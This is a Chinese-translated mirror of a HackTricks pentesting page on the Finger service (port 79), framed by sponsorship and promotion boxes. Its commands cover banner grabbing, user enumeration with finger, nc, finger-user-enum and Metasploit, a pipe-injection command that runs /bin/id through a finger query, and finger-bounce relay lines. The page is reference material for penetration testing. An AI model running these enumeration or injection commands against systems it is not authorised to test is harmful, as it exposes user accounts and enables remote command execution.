mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-27 07:01:09 +00:00
95 lines
5.5 KiB
Markdown
95 lines
5.5 KiB
Markdown
# 79 - Pentesting Finger
|
||
|
||
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
- 你在一个**网络安全公司**工作吗?你想在HackTricks中看到你的**公司广告**吗?或者你想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||
|
||
- 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||
|
||
- 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
||
|
||
- **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或者 [**telegram群组**](https://t.me/peass) 或者 **关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
|
||
- **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。
|
||
|
||
</details>
|
||
|
||
## **基本信息**
|
||
|
||
**Finger**是一个可以用来查找计算机用户信息的程序。它通常列出登录名、全名和可能的其他有关用户的详细信息。这些详细信息可能包括办公地点和电话号码(如果已知)、登录时间、空闲时间、上次阅读邮件的时间以及用户的计划和项目文件。
|
||
|
||
**默认端口:**79
|
||
```
|
||
PORT STATE SERVICE
|
||
79/tcp open finger
|
||
```
|
||
## **枚举**
|
||
|
||
### **获取横幅/基本连接**
|
||
|
||
在渗透测试中,枚举是一项重要的任务,它允许我们收集关于目标系统的信息。横幅抓取是一种常用的枚举技术,它通过与目标系统建立基本连接并读取返回的横幅信息来获取有关系统的详细信息。这些横幅信息通常包含有关操作系统、应用程序版本和其他有用的信息。通过分析这些信息,我们可以识别系统的弱点和潜在的攻击面。
|
||
|
||
要执行横幅抓取,我们可以使用`finger`命令。该命令允许我们查询远程系统上的用户信息。以下是使用`finger`命令进行横幅抓取的示例:
|
||
|
||
```plaintext
|
||
finger @<target_ip>
|
||
```
|
||
|
||
在执行此命令时,请将`<target_ip>`替换为目标系统的IP地址。执行命令后,我们将收到目标系统返回的横幅信息。
|
||
|
||
横幅抓取是一种简单而有效的枚举技术,但并不总是可用。有些系统可能已禁用`finger`服务或限制了对其的访问。在这种情况下,我们可以尝试使用其他枚举技术,如端口扫描和服务识别,以获取目标系统的信息。
|
||
```bash
|
||
nc -vn <IP> 79
|
||
echo "root" | nc -vn <IP> 79
|
||
```
|
||
### **用户枚举**
|
||
```bash
|
||
finger @<Victim> #List users
|
||
finger admin@<Victim> #Get info of user
|
||
finger user@<Victim> #Get info of user
|
||
```
|
||
或者你可以使用来自[pentestmonkey](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum)的**finger-user-enum**,以下是一些示例:
|
||
```bash
|
||
finger-user-enum.pl -U users.txt -t 10.0.0.1
|
||
finger-user-enum.pl -u root -t 10.0.0.1
|
||
finger-user-enum.pl -U users.txt -T ips.txt
|
||
```
|
||
#### **Nmap执行一个脚本来使用默认脚本**
|
||
|
||
### Metasploit使用的技巧比Nmap更多
|
||
```
|
||
use auxiliary/scanner/finger/finger_users
|
||
```
|
||
### Shodan
|
||
|
||
* `port:79 USER`
|
||
|
||
## 命令执行
|
||
```bash
|
||
finger "|/bin/id@example.com"
|
||
finger "|/bin/ls -a /@example.com"
|
||
```
|
||
## Finger反弹
|
||
|
||
[使用系统作为finger中继](https://securiteam.com/exploits/2BUQ2RFQ0I/)
|
||
```
|
||
finger user@host@victim
|
||
finger @internal@external
|
||
```
|
||
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks 云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
- 你在一家**网络安全公司**工作吗?想要在 HackTricks 中**宣传你的公司**吗?或者你想要**获取最新版本的 PEASS 或下载 HackTricks 的 PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||
|
||
- 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||
|
||
- 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
||
|
||
- **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass),或者**关注**我在**推特**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||
|
||
- **通过向 [hacktricks 仓库](https://github.com/carlospolop/hacktricks) 和 [hacktricks-cloud 仓库](https://github.com/carlospolop/hacktricks-cloud) 提交 PR 来分享你的黑客技巧**。
|
||
|
||
</details>
|